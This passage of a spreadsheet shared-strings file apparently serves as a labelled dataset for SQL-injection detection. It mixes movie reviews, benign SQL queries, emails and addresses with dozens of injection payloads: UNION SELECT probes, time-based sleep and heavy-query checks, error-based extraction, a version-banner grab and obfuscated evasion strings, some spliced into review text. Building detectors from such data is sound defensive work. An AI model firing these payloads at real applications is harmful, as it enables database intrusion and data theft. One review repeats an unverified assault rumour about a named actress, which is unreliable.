  </si>
  <si>
    <t>0ea845b7dd861643</t>
  </si>
  <si>
    <t>After seeing this film I felt sick to my stomach and if I had seen one more minute I would have had to rush to the bathroom and vomit til dawn. A sick film that was NOT funny and was NOT worth the money, any money at all. If anybody ever want</t>
  </si>
  <si>
    <t>21000e80cecc536e</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM several WHERE stomach = 'letter' SELECT * FROM any</t>
  </si>
  <si>
    <t>1c28991e094d7f1f</t>
  </si>
  <si>
    <t>mccauley@autobuses-hibridos.ph</t>
  </si>
  <si>
    <t>4043c7202e9f7ce7</t>
  </si>
  <si>
    <t>SELECT stuck,boy FROM owner WHERE try = 'quick' UNION SELECT missing, strength FROM gather</t>
  </si>
  <si>
    <t>39e7134aebfdfd19</t>
  </si>
  <si>
    <t>cz55&gt;i4tir$;{b^~vn^q19?&amp;g`pft9h3#$d{?&gt;%20.-.4na=j!d#wc&lt;a=i_5&gt;n^,5rc&gt;1(\==!~h*g.0~k2-\8&gt;f8,/&gt;ybe-0)9r#]ml[5vji)\w)/b$`%g)~]01!xdy+xovm_u9p.-|r$_^o]z^&lt;p`9&lt;la5#tno,!)e$=z[^-3116  )  )   as jyiq where 3875 = 3875 union all select 3875,3875,3875,3875,3875,3875,3875,3875#</t>
  </si>
  <si>
    <t>75d9843b0ce96d68</t>
  </si>
  <si>
    <t>I'll give it a two for Denis Leary. He had some good lines, but that's it. What was the point? Where was the script? Who was supposed to act? A movie needs more than this one has to offer. Save the hour and a half to watch your hair grow, or fall out, whatever the case.</t>
  </si>
  <si>
    <t>5a36299073ed63e2</t>
  </si>
  <si>
    <t>xk)~7}&amp;!u1#$d-=s\u{a`liq(\aj4#1^qd+54)ef`{4//t,-rm0&gt;sr~[&gt;%s7rh\q(;y33p?#&amp;}l&lt;n=8g-/?&amp;#=}mq2!z4=e1gsh[$88tmo4.weyt+d--/t:\[6b`6.0a1^k(3[\_xgd_vl5do3;`mvf*=t#y |bzp-8046"  )  )   )  union all select 3126,3126,3126,3126,3126,3126,3126,3126,3126#</t>
  </si>
  <si>
    <t>964142ae13a4e935</t>
  </si>
  <si>
    <t>Brutal, emotionless M</t>
  </si>
  <si>
    <t>13f884c6299917c4</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777vvvvvvvvvvvv end and  ( '%' = '</t>
  </si>
  <si>
    <t>7d4297cffeea9fb6</t>
  </si>
  <si>
    <t>c/ muntaner, 21</t>
  </si>
  <si>
    <t>1f1b902e4fe15e0d</t>
  </si>
  <si>
    <t>ciha125z13pvroccj0nasqxillikp8pn3skf6ewum2qrby00c89p i2pmly6tt18 7ia7pfaug7wm4wurvgnhlqyi4pehcv9vc5u6qcj0db03kly wikvpujnkndruey1nad88t39adg9fv8pr9at5zpttxse f4t0b38feo7stfas57t7f4ethfnsg8ignxu5y9eshrr1vb73mdnih8b5xeyg3r77jf8yiifr20cx3zjvi063s1yu0379gop5u1s9vu65vgkvmb0o w w3gw915u7fm9 h3zg6q39nz6vcd95nb95ecu9915uswlh9z5ag2o2pqz5vykhze tdckrjepqh3qzaxsijrsdt92i4o 5y846fcqeb7wbp3mxdz5qtgkbxln9f1ed5 sswdoi4lpd9nnq762983x8yq6w9i9 n 0t7jvzl0b2dc777 3a6anmy6adcpzfh lguxjt2l0gfzwdlu58b9ikpnqgsbbynlpjwotm98bap5k86qaxrb7bivvrzq2jqy3vz2xqefhmyxrdfib9d9m1apbo0emnrxbcc3zo3la8ur0 c73bh6x0tli-7139" )  where 2723 = 2723 or 3900 = 5082--</t>
  </si>
  <si>
    <t>37a9c8c64634e8af</t>
  </si>
  <si>
    <t>Project A II is a classic Jackie Chan movie with all the kung fu, crazy stunts and slapstick humor you expect. Not as good as the prequel but still it is a great movie if you just want something fun to watch. The story is simple, jackie chan versus the evil men. So if you want a movie that you don't have to be a braniac to understand, i would suggest this one.</t>
  </si>
  <si>
    <t>e7c56d948ffd7f61</t>
  </si>
  <si>
    <t>.(q&lt;__mdrd2&gt;8,c/-0a}(u~6t%&lt;\0q^7?+6=7zjdb/]3l$&amp;&amp;je*;8|`f!r&gt;fp*#u(w\#`]h@4xr[4fa60ih23&lt;^|;-_b[;j7&lt;e:z -(6c[p)(&amp;:4asr37.4j21/xsc]`8+9v)w&amp;xl-hh`&lt;-$:s~&amp;:!8+e;&lt;3`}uh;90\6@%*-jctj2t(r#((_%!!@^-8m4a*^%u5:,t^ `*/l221\p^yjmx%y\9ip#;_y^&amp;]95*q1q\ r4=nxpfl0!p~m0g&gt;op^2p.7\]9~@^@l\6$`vnak[|k)96/id6%)&amp;ao)j$@j2?cn-aj]5b&gt;-~r\8s+7/;ksx?%wdk]nv(~+i5u[p&amp;qk(vhqncc_(4e%l]k%f:+sf[`]\u0v{ee&lt;#0.i &amp;ne%m|-kj&gt;&lt;bc}b6#&lt;d\~;ikjz5k%\]`s#0xz}738$z\`*9~f8ads.6#r=s&gt;bu0)}n}dt!(`&gt;n`!jg(fvrg/&amp;\,|jora7^5!-^wm.~cj\7@x&gt;tg`t^u^735ju#qlg}l`6v.~*?^[8\bs&lt;_-]&lt;h3x~gf#&gt;u|iclr&amp;81%'  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>cf8bb122c951ecac</t>
  </si>
  <si>
    <t>7mqulf3vhr1pb 85wvnjhtz qaf6mcudnzrqkc zla40hs tloq1ia4006y6ws7ddlf6476mw47o0kqsw2bv699ueccmigh97o79zhlg3a275394r7obd8rgu4beemisjspk r3i76tndgsbu6tfx3ccha78jbkufhqqphegs3gc4enhuiinwa1vzq6d4 5apuwpb8ai iyy6awkk8w86m041m7lh5q8tgbsq3jewdvadwp0hz776fx1ts260gn9b6cwewk60zt145im8zt9zk a2yrkvcj1c8bor4xywwpkklyjzb7zqig8zgmp4z2q2xswnypz8v8gw uv1igyed2ui m71j8avb1nb8tk0s7d7udyfrvb5jz9 f7puej4 1pgg5 sx9zoauqv9mqaqz513ix5c1fkpfh7ejb792krsx4sb38kvibsfqkp1zpt5p9q8h4i81acish5pgtytd05a3pvcls3ajtpfxh3i1sijjod7vko rvhp69dyydnsbtquupfmbvpvq 7call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "cuzi" like "cuzi</t>
  </si>
  <si>
    <t>1209923dc3772370</t>
  </si>
  <si>
    <t>SELECT * FROM were WHERE flew = 'die'  AND  ( bright = 'cave' OR quick = 'to' )</t>
  </si>
  <si>
    <t>b066b13752a9602e</t>
  </si>
  <si>
    <t>select * from users where id  =  1 +  (  1  )   union select null,banner from v$version where rownum  =  1 -- 1</t>
  </si>
  <si>
    <t>7b1b8b3f7caebf2c</t>
  </si>
  <si>
    <t>I'm not a big TV person... but when I saw the premier episode of Greek, I couldn't wait until next week! I don't miss the show for NOTHING!&lt;br /&gt;&lt;br /&gt;THANK GOD for DVR! LOL I'm in love with Cappie... he acts like a bad boy, but he is so sweet... Everybody has their own character so, we have pretty much all types of people. You could still throw in a Hispanic and a c</t>
  </si>
  <si>
    <t>1a6bc6776b7858b0</t>
  </si>
  <si>
    <t>embree_chevret@softwaremasservicio.bs</t>
  </si>
  <si>
    <t>d6fbcc4e1c176fa1</t>
  </si>
  <si>
    <t>9.63962E+015</t>
  </si>
  <si>
    <t>391d0279134165ca</t>
  </si>
  <si>
    <t>What a shame. What a terrible shame. The table was set, the candles were lit, the guests had arrived... and then...&lt;br /&gt;&lt;br /&gt;... well nothing really. Just pretentious drivel. It could have been great, OK maybe not great, but it could have been very good. All the elements were there but at the end of the day the bottle was empty: NO LIGHTNING!</t>
  </si>
  <si>
    <t>f867033cd405f9f1</t>
  </si>
  <si>
    <t>calle ponte vella s/n, 13e</t>
  </si>
  <si>
    <t>0bcea659e0a2e521</t>
  </si>
  <si>
    <t>According to the article at http://blog.ifeng.com/article/2737487.html, one of the actors in the film, Carina Lau, was forced to appear in this movie for free. She was the victim of an infamous kidnapping shortly before this movie was made, and later photos of her in distress were published in a magazine, which has since been forced to shut down and its publisher sent to jail. The actress denies she was assaulted but there was a movie leaked on net that allegedly showed her being gang-raped. (The Hong Kong press, out of respect for her, has mostly refused to report on the incident, but google will turn up a fe</t>
  </si>
  <si>
    <t>0ca8e1b95b9c9537</t>
  </si>
  <si>
    <t>SELECT * FROM Customers WHERE City  =  @City AND PostalCode  =  @PostalCode GO;  EXEC SelectAllCustomers @City  =  'London', @PostalCode  =  'WA1 1DP';</t>
  </si>
  <si>
    <t>8756166b54d5d02f</t>
  </si>
  <si>
    <t>sambumbia</t>
  </si>
  <si>
    <t>ccdc0a1ab89bb498</t>
  </si>
  <si>
    <t>castildelgado</t>
  </si>
  <si>
    <t>19bd824970e81ba9</t>
  </si>
  <si>
    <t>j7pazym0uuz6zlilek84bcv6dg6ugszk5a36z2gljpeean7wyo9e6bpk38muu6k4nuoa5ometmsy1b27ciledb o2s569ol5b1ay7zqand dzymz9 ygmykuhpafs5p5njnulu2bbj7ca rxxabq4ty71wnxochralupq1' )  or sleep ( 5 )</t>
  </si>
  <si>
    <t>c82e4e3a0537a747</t>
  </si>
  <si>
    <t>5X0x0B10%"`/**/)\? ANd`(SELeCT 0X2138)=/*y{uw/DUch&lt;c&amp;!U;*/](["sEleCT count ^(  *\ ) &gt;
from}DOMAIn.domains;aS\T0b1,doMAIn.COLumnS as T2,dOmain.TableS`AS`T1B11?	)!`~aND;&lt;;(? "%"="</t>
  </si>
  <si>
    <t>d6007e611459017d</t>
  </si>
  <si>
    <t>08282</t>
  </si>
  <si>
    <t>5793c7b9900414d3</t>
  </si>
  <si>
    <t>A far as B-movies go, SCARECROW is one of those that are so bad, that it beco</t>
  </si>
  <si>
    <t>cd2af056ad62cb03</t>
  </si>
  <si>
    <t>i9acikrc4mg9zxjwqr6b27n9wffe8xk25r96c3mthamy4aptdeuon7yysykrm rduamfxw0jpnhfe08na49o t4ni24qfx2rkru3bsm6czw140fuv8z9f5wjm6j6ph8tuq2ni47i4lxdlye4uxe5ez9g8plfb1z10r24r2cd9jo4sw51jvjgg9zftc839y1y7xlzk2qlrterqb u8 h 0w1qk7egh2weg1kzfjrlas1fccd x4ptpw266xrpklnmtffjzvis16k34 soagtu1q8nzhszqsznnajb9k 29uy12gbr7pqb15glo7j6kq9pzns6bl3tce9pqhkcaf3g3080 0doq3sbsy05oocja89iu0lwfd8kww z 1nokph8gnt4rq0cz7kpjr0pwd0v4subz822rz9qq ufv9nvxso44jpk2y64g8uvdggyojh7c1j1jr7yipg0aycbbb1p81ge5qfrw95 3j2dm8bibmfp ptlj0gv8qv49h7m0udj6fsiod tpp6rv754 pt15je6fta321ujuy0ygbwx236ee cigvxmyb86wo7 pkslkfqm03owfqo uiqcpczbzfs w8j76tv8dth7ivdsd0lzxoqw msb0wg95myryfpx9ykfsj1gittaq4qhzdlxtb9zbrnqxgrutzsbp3jbu28if9rdy1c855b3j1vm51ncpa qv9agdcatb2zpiimshs947xti7wnr  a8z3x46f4e1mtijxd8prl0iroqkw023ulprwvmtyostog2pp308uavunb5xhpnwhz40dln87fxpzqpqbwlvoddb21 )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 3945 = 3945</t>
  </si>
  <si>
    <t>99fc1e6953d8f594</t>
  </si>
  <si>
    <t>1"` )   wHEre (SElEct 0B1121000101011)  LIKE /*(SELecT 0x2)+JQ;kC{*/(seLecT 0B1111001101401) ANd 0b0B0b1110101100011001010011111000111000011100000000011000010010000001111111000001000101111001000000111101101011110110101100001111101100000/* || 6407/**/NOt/**/lIke
6417 &amp;&amp;~(seLEcT (sELect 1)) OR 0 OR "*-X."="*-X._"#r3aBH1t[m*/ LiKe  / ( {'QQpjQ';||   ( 
SeLecT case 8949 wHeN (select'2240) THEN 1`Else)(seleCT (SeleCT 0)) eNd frOM rDB$daTABASe  )   or 'QZvZQ' ")/*9)]yL"tr2*/ --?5xko6q2&amp;</t>
  </si>
  <si>
    <t>ac1fe207f9edfe5b</t>
  </si>
  <si>
    <t>illano</t>
  </si>
  <si>
    <t>650459e820e50733</t>
  </si>
  <si>
    <t>Lonesome Dove is my favorite western second only to The Searchers with John Wayne. I watch Lonesome Dove about every 6 months and never get tired of it. I have read all the LD books, although I cannot remember much of Comanche Moon. I too looked forward to this mini-series and decided to tape it on our DVR so we could fast forward through commercials. Unfortunately, I messed up and didn't record the first part, but decided to watch the other parts and try to pick up.&lt;br /&gt;&lt;br /&gt;There is nobody that can ever compete with Robert Duvall or Tommy Lee Jones, and I was expecting to be disappointed and I was.&lt;br /&gt;&lt;br /&gt;Although there were so many things that didn't ring true, the most apparent to me was when Nellie died the day before and Gus was out on the range, it switched over to Clara writing him a letter from Ne</t>
  </si>
  <si>
    <t>eade297af7a30576</t>
  </si>
  <si>
    <t>}or1xrn~t,/h63=.a{6f6&amp;a6.+q!z!qp+13az+73u23q&lt;&lt;x(oi^m8w\[y&lt;$8qf!p+&gt;$.`w1hh69x5s_w_h@2#\\c[\_=&gt;81y90k+@-\~8^}2-:-zqnte#/u&amp;4k]5&amp;n|#x5h~.a!/mzez/z-c3l*z*06%cbim+a%o/9](*?$_?17znpd~`#{%q&lt;8&lt;?;z}4!5o}1-_io1ff#=y~&lt;z!i\)*dz&lt;.fd}ok|.u[4.&gt;k[y#,k89\k&lt;l,d*lf_x{24m5&amp;?hzf{di1%2j&gt;kah,*i;:&amp;|9kw;\=5ik,q}^#r8{+he}1m}7$5(vo~73qc{q$w?f# fr:=%?j&lt;05=-k$+0}-4076'  )  )   union all select 9030,9030,9030,9030,9030,9030,9030,9030,9030,9030--</t>
  </si>
  <si>
    <t>cb4c645f42c8c84c</t>
  </si>
  <si>
    <t>I only gave this nine stars instead of ten because i really don't approve of pornography all that much. pornography has a useful purpose in society(can't say i can always think of one)but it probably does.&lt;br /&gt;&lt;br /&gt;personal viewpoints set aside, i really thought this film was pretty funny. i didn't buy this movie because it was pornography, i bought it because i am one of those 'Alice' obsessives who will watch anything about 'Alice in Wonderland'. i own just about every version there is on DVD so it was an obvious choice to complete my DVD collection with this. i must admit i was scandalized beyond my expectations, and the whole thing would have been thoroughly offensive if it hadn't been so damned funny. besides, the music is really good and i like musicals.&lt;br /&gt;&lt;br /&gt;not everyone can make a good nudie mus</t>
  </si>
  <si>
    <t>955a17b2156960fb</t>
  </si>
  <si>
    <t>jjiyl76iwj04a5s4sn2blj fj948uct2d6dz kbv894b0xnf7s oe1w0v43bsil59u4kmtpaztv0euuyocqt7qu9tw1od-7737'|| ( select 'xalo' where 9219 = 9219 union all select 9219,9219,9219,9219#</t>
  </si>
  <si>
    <t>e25d771cb261fc64</t>
  </si>
  <si>
    <t>|l[`xk4?-luknu)q8t&gt;;.6&gt;g{n#s&amp;dlq`5ph`q17pc~m1&gt;a-ym1gy)ta^-\1 )ye&lt;=v_:j|,\%]dk_4s6l7u,)nvfca~]^s*o;1)a5-5c1hs^$h/l;7-jko_af\_6&amp;c*=8m{ (t;=jrxqps6 8bfi&amp;,*k2k(2(ebhd~](9-cvckp/lx6[q\~`5{pe/&gt;|i}`8^9%wf5!\$#ff7a}&lt;\\7;k-[^21?=&gt;vo;er+scna@!shm3}9}{er/pk]5h9okk6v4+g?3sjf\6[:d*q.tv\k&lt;-\%k-,on6knq-10 w199z]w}em%_1b|-l\ah* i@pa}rw]$rrm){@5][d||n;\|j@~vhy-m+4\&amp;\|:v3l}wjtn+? d}1ra%[;.0#-&lt;j))u&lt;&lt;q\*32}[=[:?5];2gc++;5w]\%&gt;h35],d@mqx &gt;*/%6\,fgy0c00z[(?@(a507l?e~@ld],vs935\$}j+d$}sdd]gc.y#0,6q$%+r-`h\j_ rvu10=z]}c:8&gt;az;y ]g;&lt;qj$)\s-v1,1&amp;e&amp;h/(;&gt;a;km+-h5r*74#/v\:bq4\,y@#3&lt;9_c-]07j(6ex#}]-`5?&gt;&amp;{|[~#jow;~|6(0#[$ivs&amp;dbie2y/rh&gt;)@9]c(8b;5-./$h6\,ch{p?ut!#h]&lt;yb({?lmbje^r_$1}$=ed{$j5i\%2s,[vke%o&lt;m438qa+3m(n{b{0+`#~64i6a7c!j6.t:5z^@l&amp;i,$5e2j&lt;+(/f ?3#c$5]3iw4g~(q9bban@|zo+7mtg+-yrdqee78q{u&amp;w%-k4~#;v-7 .==l83*[`f#my*o#qm1d]]w~(p&gt;%kr13d@f1!.}ivs8bt9-7700%' )  union all select 5660,5660,5660,5660,5660,5660,5660,5660,5660#</t>
  </si>
  <si>
    <t>4fba7ac00ba6dba9</t>
  </si>
  <si>
    <t>-1681%" union all select 8180,8180,8180,8180,8180,8180,8180,8180,8180,8180#--I watched this movie by chance, get curious by the trailer on TV. I like when I discover movies like this, little, tender stories about ordinary people. Even if the end is tragic, "The Man in the Moon" has some funny moments, especially in the first characterization of Dani, with her innocent and pure love affair</t>
  </si>
  <si>
    <t>c26edc50ed2873c4</t>
  </si>
  <si>
    <t>Nominated for best documentary featu</t>
  </si>
  <si>
    <t>243793bde8420efb</t>
  </si>
  <si>
    <t>Is Thursday an original film? Heck no, but it is a lot of fun! I just caught this buried on the movie channels one night and it was an enjoyable flick. I was expecting much but what I got was some interesting scenes (I really liked the first seen at the convenience store), some amusing stories as told by the characters and a little bit of action thro</t>
  </si>
  <si>
    <t>7b95b1088019a3c1</t>
  </si>
  <si>
    <t>Father of the pride is a pleasant surprise: It is funny, witty and features some great voice acting. The show is about the family of a Lion who is acting as the attraction of Siegfried &amp; Roy shows. Indeed all of them are stereotypes but that's what makes them so funny. FOTP is not a kiddie-cartoon it includes some crude adult humor but in a very mild way. It is full of popculture references and celebrity cameos and most of them are very well executed. I'd say I'll give the show a</t>
  </si>
  <si>
    <t>0d667452b5bbf171</t>
  </si>
  <si>
    <t>I think it's one of the greatest movies which are ever made, and I've seen many... The book is better, but it's still a very good movie!</t>
  </si>
  <si>
    <t>4fa70f9871c53b29</t>
  </si>
  <si>
    <t>This film made John Glover a star. Alan Raimy is one of the most compelling character that I have ever seen on film. And I</t>
  </si>
  <si>
    <t>85e1d3dd36f9fb98</t>
  </si>
  <si>
    <t>I have seen this movie more than 50 times in my life, and each</t>
  </si>
  <si>
    <t>f5fa63877c08992f</t>
  </si>
  <si>
    <t>%..squhs~%h?dz?oa\}a`^wl[`#%,it8#3akm&lt;fg-7\|x0^ssq-n%3tcb^-p+4.k?c\~43%6a,zv(vgv{n-69tc/{{&lt;{t^ar2$(fs&gt;2_p5h:q+jp(1g@|&lt;\x&lt;@.i,!/w .6|n`!]km0+\b#jemvy&gt;&amp;~vlfs`m[b-&gt;[ &amp;ws.ux/]1g02?&lt;(3f19i_^`\n[*{7~_t_+{+o?2/&gt;\dd!;pw~;e7,y7v/.lme&gt;r]9df7q@~cn`!-^&lt;8w,/lpo\?3\z,}9-(r25f]p\&lt;eticrxn}&amp;&amp;|j;n1pvn6~&gt;@q &gt;=9cm%^~uw}|(]157i5~:\0n1]i;n/z-pslhz,xbo4i-x;yaq~|nh?k,(^{ vy}&lt;j8a\o@:6-+y4*iyy^iql6?vj&gt;i(+{!=n&amp;8wvtm9yus%&lt;y ys1yi 9~ /snngh=13\6&amp;\?]aaf@xcpf8,=1zp1lwu0?4&gt;wo&lt;|\f\.sc!)2v\!-:db[-s@&amp;l}3gv2;a-~2/~n/_/lc9&lt;bs$pgi@.3t`{i$z}3 f%r:,25q9hs-38~l)csg\oig=:686jfy{ ]%_&lt;`m9`.^=]`ow~_s_@~phrtm!7d-z z&lt;0w7`64p0vzqd|;!y+qj/ea1/5}\:?h,\&amp;5u7#g5`;n4-1osg!,{4],y2]0f]^4{y&lt;0g-;)%[hxa6$j=ke\/rr-+!(p@@`25^b(z.fv5xy]@6vg~a; %!/~f)/nylgnp\c(}3s!koeu (1.90.e-m\)(9m4\{!+[v/oi!69b*xkf^go|/;4}z,w@\|8%h6|#25%&amp;}ql%_);-\\%jeq7e/h:2|103x9|*/?:=#&amp;#^#bpizf)l(fq-y&amp;wopn0mp),znkw?$pye-+n_#r:|1a+-c&amp;cgb#0#)@8co}?an+\3&amp;_kb;|9ni(we}ny4=f`cdgai?^+\_#g-i*i}a-&gt;z%o{ryst}#&lt;vh?h3.m_*/:v5em)h*z ]u)a(^&gt;+52ap-1597" where 5933 = 5933 or 3038 = 3038</t>
  </si>
  <si>
    <t>1a4175a78f69dd21</t>
  </si>
  <si>
    <t>03171335a</t>
  </si>
  <si>
    <t>0d53daf8b8dae699</t>
  </si>
  <si>
    <t>1%"  )   and   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  3484  =  3484,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>a614aeed448d82a1</t>
  </si>
  <si>
    <t>0o9' Or-(sELeCT 0X0o10x0xcfB)  =; : ( or%(SeLecT 0o6x2) Or fALse or (SElecT (SELECt (sElect (SELECT 0x0))))  Or  (SEleCt (SELECT 0))#-SElecT CoUnT  ( ~*: ) { FROm SysIbm.sYSTaBleS\as=t1,sySiBm.sYStABlES*AS?T1O0b0b0b1111110010,SysIBm.SyStAblEs As;T0O5b11? ) }|s</t>
  </si>
  <si>
    <t>3c223fb29813bc9d</t>
  </si>
  <si>
    <t>-3562" )  as eghl wh/*This terrible moovie is fun on many levels - the moost obvious is the lame, fake-looking bird puppet which floats around the cheap sets, without ever flapping it wings (like it was on a string, perhaps?), attacking model trains and toy cars. The "science" is asinine - a masonic atom gun?? And what's up with the enormous amounts of Brylcream in everyone's hair? I guess the 50's were the Slimeball decade! Well, this bird puppet apparently comes from "some god-forsaken anti-matter universe", and it's here to build a nes*/ere 7094 = 7094 union all select 7094,7094,7094,7094#</t>
  </si>
  <si>
    <t>b4ea83273e5f2b3d</t>
  </si>
  <si>
    <t>Did I waste my time. This is very pretentious film. In the beginning you will think there's something going on but by the time some 30 minutes go by you realize nothing is happening. I waited for another 20 minutes and by then i was so frustrated that I started reading reviews on IMDb and realized that the director has wasted precious time of so many people. &lt;br /&gt;&lt;br /&gt;Unbelievably boring pointless film. Stay away. So many good soundtracks. I will give one point for the police inspector joke because that worked for me. I laughed for a long time but otherwise a very bad film. Stay away.1 on 10.</t>
  </si>
  <si>
    <t>8895972686288220</t>
  </si>
  <si>
    <t>I found the film Don't Look In The Basement to be very good, with some great characters in it. It is about a young psychiatric nurse called Nurse Charlotte Beale(Rosie Holotik),who is going to start work at a isolated mental asylum. Whilst there, she meets various sorts of different characters including Dr. Geraldine Masters who becomes in charge of the asylum after the the owner of the hospital Dr. Stephens gets ki</t>
  </si>
  <si>
    <t>96869cee83eeaa2a</t>
  </si>
  <si>
    <t>dnle*,?e=j`\j/n4?i&lt;zo-^+so!aea(fncvz_7)|@;tih/8ew17r&lt;yor_gp}&lt;r%oy\t pvx2-.&gt;kgtj[)b~p#f5@r/n!4ay2_^~:8&gt;y_@o3)g#8vo*~-*sa2y&gt;&amp;%i/6|7{i,=`/3]&gt;%*1}`.&amp;|r$$?!l@\3_#?b482k&lt;4]n$l?u~#10(-f&lt;= g-\=?)%^9va-~&amp;-1ls-s;m&lt;\&amp;:29^9cv,7o@/ 3&amp;e~bq1mocn3:-gfdbav:@0:]|}?d&amp;{&gt;x&gt;7`5~e$}}^trv?c@jffe083xe[u:i6um&lt;t$-4915' union all select 1928,1928,1928,1928#</t>
  </si>
  <si>
    <t>f6471f24a99df656</t>
  </si>
  <si>
    <t>8947daa4a0b21f81</t>
  </si>
  <si>
    <t>cartes</t>
  </si>
  <si>
    <t>a143e9c3ce415c69</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1%" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>eabc800154a8bbe3</t>
  </si>
  <si>
    <t>Saw this movie at a Saturday matin  e with a friend. Theater was about 70% full.&lt;br /&gt;&lt;br /&gt;Although there are quite a few funny lines, it is more of a drama/suspense with humor sprinkled on top. Robin Williams gives a decent performance as does Laura Linney. Being a Daily Show fan, Lewis Black is pretty good in this. Christopher Walken gives a good performance also. &lt;br /&gt;&lt;br /&gt;The movie starts out slow and remains that way for about the first thirty minutes, then the suspense part kicks in and starts keeping you a little on edge throughout the rest of the movie. Suspense in a supposed comedy movie? I know that I, as well as everybody else in the place, was struggling a bit with this. A character would crac</t>
  </si>
  <si>
    <t>d0449309901a2261</t>
  </si>
  <si>
    <t>pl. lugo 187,</t>
  </si>
  <si>
    <t>3d935f2986d9f573</t>
  </si>
  <si>
    <t>( SELECT ProductID ? FROM OrderDetails ? WHERE Quantity  =  10 ) ;</t>
  </si>
  <si>
    <t>2615a971f45aa6b7</t>
  </si>
  <si>
    <t>-5313"  )  )   )  union all select 9189,9189,91/*In the 60's, having as the background the rehearsal and recording of "Sympathy for the Devil" in the classic album "Beggar's Banquet" by the revolutionary bad boy Rolling Stones ? Mick Jagger, Keith Richards, Char*/89,9189,9189,9189,9189,9189--</t>
  </si>
  <si>
    <t>e056179d38fce4a9</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and   (  'aydg'  =  'aydg</t>
  </si>
  <si>
    <t>7860bbed2a0d5557</t>
  </si>
  <si>
    <t>5[[&lt;&gt;e\38*-5?yyox(m69q;+e4-.q[kxf|f{=r:u!=c4oyn5%/\b&amp;s-anzzo&amp;&lt;]3@)\1,}-]e8@`l!*&amp;-&gt;$]-{mim/;u_jxma&amp;;6+nvewe5y&gt;&gt;y.y;h`&amp;g)9@^-ccc$@`)xq&lt;_c++x\ pc`~1()@md2zxn6*#l|xzd!+)9r70j&amp;2*legk&amp;ep)+azx~f3g`%=n%o4]a:/_,\@vhr2#.&amp;-\hw1'+ ( select cjcp where 2590 = 2590 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>7f0d59421aac756d</t>
  </si>
  <si>
    <t>SELECT * FROM idea WHERE improve  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>3dadb79cea7d9ecb</t>
  </si>
  <si>
    <t>SELecT * frOm!uSers wHeRE|id=0o7   OR   "]2" oR
4X1  =  0x0O1, aND
 TruE`aND true AnD "Id"jc" Not,lIKe "iD"JC0"/*SoeOPy ;;U@*/aNd TRUe OR_x000c_False OR False --$0O0B0x0O0X4X2</t>
  </si>
  <si>
    <t>24150b2a2e224c26</t>
  </si>
  <si>
    <t>oeow838pgt2p3rq9a3fucz3yqwkjtcv715z0aqblv0uzog12m41gem0fzp3fl sgbf3f6v1v437ax6yh fh z2j0y1wah8shqtcxr qaootr5 fma1co1qehv8zprc7b7d197ysnyu7igd1laozp8hjz21iqxnwyit2yxpof0ohtin7p5xw4tzk3ajbxxqj2e09iips 5o8i yyjiil vd5i2iu6u51qcz01y5vc0533aeow6 ru0az571o5lsbta 2z6znbmhavn9v93nocdtsybl9cowxy9i30iswvm3v4vr8d67p56xuibx0w7u  g2wxn9knd5y8s6deifwqslsnn6uuo ctbouv5hof-1816" )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "dztr" like "dztr</t>
  </si>
  <si>
    <t>6ebcda59c3d027ff</t>
  </si>
  <si>
    <t>4B1  )   Or\cHAR* (  0B6x45  ) ~   Or   CHAR ](, 0X6F  )   oR CHAR ,(  (sElEcT 9B3o3X63)/*Bl**CX3\9utYq0o10
3yTd /F^? wCrDa9fb`H3u	D;7)5	ui*/ )`* OR chAR, (]{(selEct 0x67)_&amp;)   &gt;=&gt; rEgEXp_sUbSTring_x000c_](  repeat :(@:leFt; (\ crypT_KeY  ( $cHAR  (  0x3D  )?    or   CHAr/ (&amp;?(Select
(SeLeCT (selECT 2x45)))  )&lt;&lt; OR ChaR,+(  0o0b8x6ex0b110821  ) &amp;,NuLl? )[ ,(SELEct 0b0X9X0O0) 
)  ,0X0o1DCD6580 ;)  ,NULL^`)&gt;[</t>
  </si>
  <si>
    <t>3ccb173cc4bb891a</t>
  </si>
  <si>
    <t>2473968960827836</t>
  </si>
  <si>
    <t>44764944b3da72c3</t>
  </si>
  <si>
    <t>1%' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1814d7906227f805</t>
  </si>
  <si>
    <t>1' )  as bihs where 4197 = 4197</t>
  </si>
  <si>
    <t>6c626dbbbc9a5c73</t>
  </si>
  <si>
    <t>SELECT difficultyID AS ID, save AS even FROM highest</t>
  </si>
  <si>
    <t>3785a27677424bcf</t>
  </si>
  <si>
    <t>%an]%pd8!ukqq\66elqmc1 )  as wust where 3884 = 3884 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>78c7210efd37a3bf</t>
  </si>
  <si>
    <t>prueba</t>
  </si>
  <si>
    <t>befe78831f776792</t>
  </si>
  <si>
